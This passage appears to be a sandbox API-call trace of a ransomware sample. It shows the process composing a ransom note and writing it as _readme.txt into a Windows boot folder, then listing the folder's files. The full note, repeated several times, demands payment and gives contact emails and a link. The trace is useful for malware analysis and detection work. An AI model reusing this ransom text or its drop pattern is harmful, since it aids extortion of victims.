hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.165] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0094.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.165] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.165] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.165] PathFindFileNameW (pszPath="") returned="" [0094.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.165] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.166] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.167] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0094.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.167] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0094.167] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0094.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.167] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.167] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0094.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.168] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.168] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.169] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\_readme.txt" (normalized: "c:\\boot\\tr-tr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.169] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.169] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.169] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.170] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.171] CloseHandle (hObject=0x5c8) returned 1 [0094.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.171] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.171] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.171] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.171] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.171] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.172] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a944e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.172] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a944e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.172] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.172] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.172] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.172] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.173] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.173] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.176] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | 